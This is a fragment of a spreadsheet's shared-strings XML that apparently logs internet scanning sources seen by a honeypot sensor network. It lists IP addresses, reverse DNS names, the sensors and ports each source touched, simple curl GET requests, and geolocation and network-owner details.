    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_LDAP_H18&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_HTTP_H32&amp;&amp;SMA-LAB_HTTPS_H8&amp;&amp;SMA-LAB_SSH_H28&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H19</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;389&amp;&amp;445&amp;&amp;80&amp;&amp;443&amp;&amp;22&amp;&amp;49745&amp;&amp;30116&amp;&amp;23&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7e:a86f</t>
  </si>
  <si>
    <t>757a178d093f8f9cf9c8c8f138bc300f</t>
  </si>
  <si>
    <t>118.40.114.71</t>
  </si>
  <si>
    <t>Yeonggwang-gun</t>
  </si>
  <si>
    <t>Yeonggwang-gun (Yeonggwang-eup)</t>
  </si>
  <si>
    <t>1832500</t>
  </si>
  <si>
    <t>35.2948</t>
  </si>
  <si>
    <t>126.506</t>
  </si>
  <si>
    <t>::ffff:7628:7247</t>
  </si>
  <si>
    <t>bf17aa653b8a82f0a752c3be943d191a</t>
  </si>
  <si>
    <t>125.228.104.109</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-228-104-109.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H25</t>
  </si>
  <si>
    <t>23&amp;&amp;56786</t>
  </si>
  <si>
    <t>::ffff:7de4:686d</t>
  </si>
  <si>
    <t>b782a98dae5d380f6d1d4c6362ffd9b6</t>
  </si>
  <si>
    <t>220.135.152.48</t>
  </si>
  <si>
    <t>220-135-152-48.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;3135&amp;&amp;80&amp;&amp;23&amp;&amp;42307&amp;&amp;61511&amp;&amp;42313&amp;&amp;9100&amp;&amp;NA&amp;&amp;15635&amp;&amp;54732&amp;&amp;58345&amp;&amp;29172</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc87:9830</t>
  </si>
  <si>
    <t>1e6a07e8fa1ba9306c3d2a791caea63f</t>
  </si>
  <si>
    <t>114.35.175.90</t>
  </si>
  <si>
    <t>114-35-175-90.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_DNS_H39&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;NA&amp;&amp;53&amp;&amp;35220&amp;&amp;23&amp;&amp;19292&amp;&amp;9100&amp;&amp;45377</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7223:af5a</t>
  </si>
  <si>
    <t>6fa3436eef423f80683add57460ee905</t>
  </si>
  <si>
    <t>122.117.92.251</t>
  </si>
  <si>
    <t>122-117-92-251.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H12&amp;&amp;SMA-LAB_DNS_H8&amp;&amp;SMA-LAB_PJL_H37&amp;&amp;SMA-LAB_LDAP_H13&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_HTTPS_H7&amp;&amp;SMA-LAB_SOCKS5_H44&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_HTTP_H1&amp;&amp;SMA-LAB_NTP_H26&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;53&amp;&amp;9100&amp;&amp;389&amp;&amp;445&amp;&amp;443&amp;&amp;1080&amp;&amp;5900&amp;&amp;80&amp;&amp;123&amp;&amp;41048&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7a75:5cfb</t>
  </si>
  <si>
    <t>8da2a646d54213d18996349f0c401040</t>
  </si>
  <si>
    <t>114.33.112.54</t>
  </si>
  <si>
    <t>114-33-112-54.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H18&amp;&amp;SMA-LAB_PJL_H24&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_SOCKS5_H8&amp;&amp;SMA-LAB_SSH_H25&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_IPP_H38&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H17</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;9100&amp;&amp;443&amp;&amp;80&amp;&amp;5900&amp;&amp;1080&amp;&amp;22&amp;&amp;445&amp;&amp;631&amp;&amp;58414&amp;&amp;23</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7221:7036</t>
  </si>
  <si>
    <t>dae87bba95be1f29321f78f12039ed28</t>
  </si>
  <si>
    <t>122.116.254.191</t>
  </si>
  <si>
    <t>122-116-254-191.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTPS_H28&amp;&amp;SMA-LAB_DNS_H42&amp;&amp;SMA-LAB_NTP_H38&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_LDAP_H3&amp;&amp;SMA-LAB_HTTP_H15&amp;&amp;SMA-LAB_VNC_H2&amp;&amp;SMA-LAB_SSH_H11&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H17</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;443&amp;&amp;53&amp;&amp;123&amp;&amp;445&amp;&amp;389&amp;&amp;80&amp;&amp;5900&amp;&amp;22&amp;&amp;670&amp;&amp;41696&amp;&amp;41632&amp;&amp;23&amp;&amp;9100&amp;&amp;60591</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7a74:febf</t>
  </si>
  <si>
    <t>982b2f1bb4a9e4ef0152c0695d48da39</t>
  </si>
  <si>
    <t>220.135.10.241</t>
  </si>
  <si>
    <t>220-135-10-241.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;38868&amp;&amp;23&amp;&amp;NA&amp;&amp;53515&amp;&amp;9100&amp;&amp;38201&amp;&amp;80</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc87:af1</t>
  </si>
  <si>
    <t>4051375455bac7bfd3bd6b7a2f9359f9</t>
  </si>
  <si>
    <t>117.207.172.73</t>
  </si>
  <si>
    <t>::ffff:75cf:ac49</t>
  </si>
  <si>
    <t>3710f1b2fa0a3dc2d65c0870744ab567</t>
  </si>
  <si>
    <t>125.228.163.111</t>
  </si>
  <si>
    <t>125-228-163-111.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H45</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;49969&amp;&amp;13076&amp;&amp;23&amp;&amp;9100&amp;&amp;41050&amp;&amp;47653</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de4:a36f</t>
  </si>
  <si>
    <t>bc4df0964fdd38f48fc7d67425e141bc</t>
  </si>
  <si>
    <t>187.110.138.130</t>
  </si>
  <si>
    <t>187-110-138-130.vbtelecom.net.br</t>
  </si>
  <si>
    <t>São Gonçalo do Sapucaí</t>
  </si>
  <si>
    <t>3449056</t>
  </si>
  <si>
    <t>-21.8922</t>
  </si>
  <si>
    <t>-45.5953</t>
  </si>
  <si>
    <t>53127</t>
  </si>
  <si>
    <t>AS53127</t>
  </si>
  <si>
    <t>VB Telecom Com. e Serv. de Info Ltda</t>
  </si>
  <si>
    <t>::ffff:bb6e:8a82</t>
  </si>
  <si>
    <t>d6423d283adf241a525b5b0911ded84a</t>
  </si>
  <si>
    <t>103.244.107.81</t>
  </si>
  <si>
    <t>Kabupaten Karawang</t>
  </si>
  <si>
    <t>Rengasdengklok</t>
  </si>
  <si>
    <t>1629710</t>
  </si>
  <si>
    <t>-6.11672</t>
  </si>
  <si>
    <t>107.273</t>
  </si>
  <si>
    <t>151542</t>
  </si>
  <si>
    <t>PT Sahabat Fiber Indonesia</t>
  </si>
  <si>
    <t>2023-07-28</t>
  </si>
  <si>
    <t>IDNIC-SAFINDO-ID</t>
  </si>
  <si>
    <t>::ffff:67f4:6b51</t>
  </si>
  <si>
    <t>b95107cf14cc45e29b9c9911faab0817</t>
  </si>
  <si>
    <t>49.213.203.50</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H19</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;46715&amp;&amp;23&amp;&amp;57812&amp;&amp;52414&amp;&amp;52398&amp;&amp;80&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:31d5:cb32</t>
  </si>
  <si>
    <t>fbc0499a8f8478e2cdb850eb659f28e3</t>
  </si>
  <si>
    <t>27.96.240.204</t>
  </si>
  <si>
    <t>27-96-240-204.veetime.com&amp;&amp;NA</t>
  </si>
  <si>
